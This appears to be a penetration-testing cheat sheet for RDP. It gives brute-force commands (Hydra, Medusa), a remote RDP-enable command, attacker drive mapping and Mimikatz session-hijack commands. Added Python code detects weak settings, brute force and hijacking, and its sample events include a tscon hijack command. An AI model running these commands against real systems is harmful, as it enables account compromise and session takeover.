# Port 3389 | RDP

## Enumeration

### Nmap

```bash
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 <IP>
```
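The `rdp-enum-encryption` script tells you which security layers and cipher levels the server still accepts, which is the part a defender cares about (NLA enforced or not, legacy RC4 still negotiable). The following is an added example, not code from the original page or from the nmap project: it parses that script's output and turns it into findings. The two sample outputs are constructed, and the exact line layout is an assumption about what the script prints; adjust the regex if your nmap version differs.

```python
"""Parse nmap rdp-enum-encryption output and flag weak RDP settings.

Added example; this is not code from the original page or from the nmap
project. SAMPLE_* below are constructed to resemble the script's output, and
the exact line layout is an assumption: adjust the regex if your nmap version
prints it differently.
"""
import re

# Constructed: a host that still accepts legacy "Native RDP" (no NLA) and RC4 40/56-bit.
SAMPLE_WEAK = """\
PORT     STATE SERVICE
3389/tcp open  ms-wbt-server
| rdp-enum-encryption:
|   Security layer
|     CredSSP (NLA): SUCCESS
|     CredSSP with Early User Auth: SUCCESS
|     RDSTLS: SUCCESS
|     SSL: SUCCESS
|     Native RDP: SUCCESS
|   RDP Encryption level: Client Compatible
|     40-bit RC4: SUCCESS
|     56-bit RC4: SUCCESS
|     128-bit RC4: SUCCESS
|     FIPS 140-1: SUCCESS
|_  RDP Protocol Version:  RDP 5.x, 6.x, 7.x, or 8.x server
"""

# Constructed: the same host after enforcing NLA and a High encryption level.
SAMPLE_HARDENED = """\
| rdp-enum-encryption:
|   Security layer
|     CredSSP (NLA): SUCCESS
|     CredSSP with Early User Auth: SUCCESS
|     RDSTLS: SUCCESS
|     SSL: FAILED
|     Native RDP: FAILED
|   RDP Encryption level: High
|     40-bit RC4: FAILED
|     56-bit RC4: FAILED
|     128-bit RC4: SUCCESS
|     FIPS 140-1: SUCCESS
|_  RDP Protocol Version:  RDP 5.x, 6.x, 7.x, or 8.x server
"""

# "|" or "|_", whitespace, then "key: value"
_KV = re.compile(r"^\|[_ ]\s+(?P<key>[^:]+?):\s*(?P<val>.+?)\s*$")


def parse_rdp_enum_encryption(text):
    """Return a dict with the security layers, encryption level/methods and version."""
    result = {"security_layer": {}, "encryption_level": None,
              "encryption_methods": {}, "protocol_version": None}
    section = None
    for line in text.splitlines():
        if not line.startswith("|"):
            continue                      # nmap port table, not script output
        if line.lstrip("|_ ").rstrip() == "Security layer":
            section = "security_layer"
            continue
        m = _KV.match(line)
        if not m:
            continue
        key, val = m.group("key").strip(), m.group("val").strip()
        if key == "RDP Encryption level":
            result["encryption_level"] = val
            section = "encryption_methods"  # cipher lines follow this header
        elif key == "RDP Protocol Version":
            result["protocol_version"] = val
            section = None
        elif section:
            result[section][key] = val
    return result


def assess(parsed):
    """Return defender-facing findings; an empty list means nothing was flagged."""
    findings = []
    layers, ciphers = parsed["security_layer"], parsed["encryption_methods"]
    if layers.get("Native RDP") == "SUCCESS":
        findings.append("NLA not enforced: server still accepts Native RDP security")
    if layers.get("CredSSP (NLA)") != "SUCCESS":
        findings.append("CredSSP (NLA) not offered")
    for weak in ("40-bit RC4", "56-bit RC4"):
        if ciphers.get(weak) == "SUCCESS":
            findings.append(f"weak legacy cipher accepted: {weak}")
    if parsed["encryption_level"] in ("Low", "Client Compatible"):
        findings.append(f"encryption level '{parsed['encryption_level']}' lets the client pick weak ciphers")
    return findings


if __name__ == "__main__":
    for name, sample in (("weak", SAMPLE_WEAK), ("hardened", SAMPLE_HARDENED)):
        print(name, assess(parse_rdp_enum_encryption(sample)) or "no findings")
```

Feed it the saved nmap output of a scan and the `assess` list is what goes into the report: "Native RDP: SUCCESS" means the server will talk to clients that never authenticate before the session is set up, which is exactly the state that brute forcing and MS12-020-style attacks depend on.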
## Bruteforce

Brute forcing can easily lock out user accounts. If possible, enumerate the domain password policy before proceeding.

### Hydra

```bash
hydra -L <User/s.txt> -P <Password/s.txt> rdp://<IP>
```

### Medusa

```bash
medusa -h <IP> -u <User> -P <Password/s.txt> -M rdp -t 4
```
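On the receiving end, the lockout risk described above is also what makes this activity easy to spot: a burst of failed RDP logons (Event ID 4625 with logon type 10) from one source, often followed by lockouts (Event ID 4740). The following is an added example, not code from the original page: a sliding-window detector over constructed Security-log records exported as JSON lines. Field names follow the Windows event XML; the threshold and window are assumptions to tune against the domain's lockout policy.

```python
"""Detect RDP brute-force and password-spray bursts in Windows Security events.

Added example; not code from the original page. The records below are
constructed to mimic Event ID 4625 (failed logon) and 4740 (account locked
out) exported as JSON lines, using the field names from the event XML
(EventID, TimeCreated, TargetUserName, IpAddress, LogonType,
CallerComputerName). Logon type 10 is RemoteInteractive, i.e. RDP.
"""
import json
from collections import defaultdict, deque
from datetime import datetime, timedelta

RDP_LOGON_TYPE = 10

# Constructed sample: six RDP failures from 10.0.0.50 in 25 s across three
# accounts followed by a lockout, one non-RDP (type 3) failure from the same
# source, and a single benign failure from 10.0.0.77.
SAMPLE_EVENTS = [json.dumps(e) for e in [
    {"EventID": 4625, "TimeCreated": "2024-01-15T09:00:00Z", "TargetUserName": "alice", "IpAddress": "10.0.0.50", "LogonType": 10},
    {"EventID": 4625, "TimeCreated": "2024-01-15T09:00:02Z", "TargetUserName": "alice", "IpAddress": "10.0.0.50", "LogonType": 3},
    {"EventID": 4625, "TimeCreated": "2024-01-15T09:00:05Z", "TargetUserName": "alice", "IpAddress": "10.0.0.50", "LogonType": 10},
    {"EventID": 4625, "TimeCreated": "2024-01-15T09:00:10Z", "TargetUserName": "bob",   "IpAddress": "10.0.0.50", "LogonType": 10},
    {"EventID": 4625, "TimeCreated": "2024-01-15T09:00:15Z", "TargetUserName": "carol", "IpAddress": "10.0.0.50", "LogonType": 10},
    {"EventID": 4625, "TimeCreated": "2024-01-15T09:00:20Z", "TargetUserName": "alice", "IpAddress": "10.0.0.50", "LogonType": 10},
    {"EventID": 4625, "TimeCreated": "2024-01-15T09:00:25Z", "TargetUserName": "alice", "IpAddress": "10.0.0.50", "LogonType": 10},
    {"EventID": 4740, "TimeCreated": "2024-01-15T09:00:26Z", "TargetUserName": "alice", "CallerComputerName": "WS01"},
    {"EventID": 4625, "TimeCreated": "2024-01-15T09:01:00Z", "TargetUserName": "dave",  "IpAddress": "10.0.0.77", "LogonType": 10},
]]


def parse_events(lines):
    """Decode JSON lines and sort them by timestamp (exports are not always ordered)."""
    events = []
    for line in lines:
        e = json.loads(line)
        e["ts"] = datetime.strptime(e["TimeCreated"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(e)
    return sorted(events, key=lambda e: e["ts"])


def detect_rdp_bruteforce(lines, threshold=5, window_seconds=60):
    """Return one alert per source IP whose RDP failures reach `threshold`
    within a sliding window of `window_seconds`, plus one per lockout (4740).
    Alerts are emitted in event order."""
    alerts = []
    recent = defaultdict(deque)       # ip -> timestamps of type-10 failures in window
    users_by_ip = defaultdict(set)    # ip -> accounts tried (not pruned; spray indicator)
    flagged = set()
    window = timedelta(seconds=window_seconds)
    for e in parse_events(lines):
        if e["EventID"] == 4740:
            alerts.append({"type": "lockout", "user": e["TargetUserName"],
                           "caller": e.get("CallerComputerName")})
            continue
        if e["EventID"] != 4625 or e.get("LogonType") != RDP_LOGON_TYPE:
            continue
        ip = e["IpAddress"]
        q = recent[ip]
        q.append(e["ts"])
        users_by_ip[ip].add(e["TargetUserName"])
        while q and e["ts"] - q[0] > window:   # drop failures older than the window
            q.popleft()
        if len(q) >= threshold and ip not in flagged:
            flagged.add(ip)                     # alert once per source
            users = sorted(users_by_ip[ip])
            alerts.append({"type": "bruteforce", "source": ip, "failures": len(q),
                           "users": users,
                           "pattern": "spray" if len(users) > 1 else "single-account"})
    return alerts


if __name__ == "__main__":
    for alert in detect_rdp_bruteforce(SAMPLE_EVENTS):
        print(alert)
```

The "spray" label (many accounts, few attempts each) is worth keeping separate from single-account hammering, because a spray is tuned to stay under the lockout threshold and a per-account rule never fires on it; the per-source window does.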
## Connecting

### Crackmapexec

Requires administrative privileges; enables RDP on the target host.

```bash
crackmapexec smb '<IP>' -u '<User>' -p '<Password>' -M rdp -o ACTION=enable # Enable RDP
```

### rdesktop

```bash
rdesktop -u <Username> <IP>
rdesktop -d <Domain> -u <Username> -p <Password> <IP>
```

### xfreerdp

```bash
xfreerdp /v:'<IP>' /u:'<User>' /p:'<Password>'
xfreerdp /v:'<IP>' /u:'<User>' /p:'<Password>' +clipboard
# Maps the specified folder on the attacking machine to the RDP host
xfreerdp /v:'<IP>' /u:'<User>' /p:'<Password>' +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share
```
## Hijacking

This method is not stealthy: it will disconnect a user's active terminal services session. However, you can also connect to an already disconnected session, which is stealthier.

This method also requires SYSTEM privileges on the terminal server host.

### Mimikatz

List terminal services sessions:

```powershell
Invoke-Mimikatz -Command '"ts::sessions"'
```

Connect to the terminal services session (here session id 4):

```powershell
Invoke-Mimikatz -Command '"token::elevate" "ts::remote /id:4"'
```
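The two facts above (it needs SYSTEM, and it resumes someone else's session) are also the two things a defender can look for. The following is an added example, not code from the original page: it applies two heuristics of my own to constructed Windows event records exported as JSON lines. First, `tscon.exe` started as SYSTEM or registered as a service (Event 4688 / 7045); tscon is the native equivalent of `ts::remote`. Second, a session reconnect (Event 4778) where a LogonID reappears from a different client address than the one it first connected from. Field names follow the event XML; the service name and client names are constructed.

```python
"""Flag indicators of RDP session hijacking in Windows event records.

Added example; not code from the original page. Two heuristics, both my own
assumptions rather than anything the page states: (1) tscon.exe started as
SYSTEM or registered as a service (Event 4688 / 7045), since taking over a
session needs SYSTEM and tscon is the native way to do it; (2) a session
reconnect (Event 4778) where a LogonID reappears from a different client
address than the one it first connected from, i.e. someone else resumed the
session. All records below are constructed; field names follow the event XML.
"""
import json

# Constructed sample: alice connects and disconnects, a service runs tscon as
# SYSTEM, then alice's session is resumed from a different client. bob's
# disconnect/reconnect from the same client is the benign baseline.
SAMPLE_EVENTS = [json.dumps(e) for e in [
    {"EventID": 4778, "AccountName": "alice", "LogonID": "0x3E7A1", "SessionName": "RDP-Tcp#3",
     "ClientName": "WS-ALICE", "ClientAddress": "10.0.0.12"},
    {"EventID": 4779, "AccountName": "alice", "LogonID": "0x3E7A1", "SessionName": "RDP-Tcp#3",
     "ClientName": "WS-ALICE", "ClientAddress": "10.0.0.12"},
    {"EventID": 7045, "ServiceName": "sesshijack", "ImagePath": "cmd.exe /k tscon 3 /dest:rdp-tcp#5"},
    {"EventID": 4688, "SubjectUserName": "SYSTEM", "NewProcessName": "C:\\Windows\\System32\\tscon.exe",
     "CommandLine": "tscon 3 /dest:rdp-tcp#5", "ParentProcessName": "C:\\Windows\\System32\\cmd.exe"},
    {"EventID": 4778, "AccountName": "alice", "LogonID": "0x3E7A1", "SessionName": "RDP-Tcp#3",
     "ClientName": "OTHER-HOST", "ClientAddress": "10.0.0.99"},
    {"EventID": 4778, "AccountName": "bob", "LogonID": "0x4A100", "SessionName": "RDP-Tcp#1",
     "ClientName": "WS-BOB", "ClientAddress": "10.0.0.20"},
    {"EventID": 4779, "AccountName": "bob", "LogonID": "0x4A100", "SessionName": "RDP-Tcp#1",
     "ClientName": "WS-BOB", "ClientAddress": "10.0.0.20"},
    {"EventID": 4778, "AccountName": "bob", "LogonID": "0x4A100", "SessionName": "RDP-Tcp#1",
     "ClientName": "WS-BOB", "ClientAddress": "10.0.0.20"},
]]


def detect_session_hijack(lines):
    """Return alerts in event order for the two heuristics described above."""
    alerts = []
    first_client = {}   # LogonID -> ClientAddress seen on its first 4778
    for line in lines:
        e = json.loads(line)
        eid = e["EventID"]
        if eid == 4688:
            image = e.get("NewProcessName", "").lower()
            if image.endswith("\\tscon.exe") and e.get("SubjectUserName", "").upper() == "SYSTEM":
                alerts.append({"type": "tscon_as_system", "cmd": e.get("CommandLine"),
                               "parent": e.get("ParentProcessName")})
        elif eid == 7045:
            if "tscon" in e.get("ImagePath", "").lower():
                alerts.append({"type": "tscon_service", "service": e.get("ServiceName")})
        elif eid == 4778:
            # setdefault records the first client for this LogonID and returns it
            prev = first_client.setdefault(e["LogonID"], e["ClientAddress"])
            if prev != e["ClientAddress"]:
                alerts.append({"type": "reconnect_from_new_client", "user": e["AccountName"],
                               "session": e["SessionName"], "previous": prev,
                               "current": e["ClientAddress"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_session_hijack(SAMPLE_EVENTS):
        print(alert)
```

The reconnect heuristic on its own is noisy, since people legitimately resume sessions from a different workstation; treat it as supporting evidence and correlate it with the tscon indicators and with a 4779 disconnect that the user did not initiate. Where Sysmon is deployed, its process-creation event carries the same image and user fields as 4688 and can be matched the same way.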
## Man-in-the-Middle

SETH can be used to perform man-in-the-middle attacks over RDP. See the SETH "RDP MiTM" documentation for details.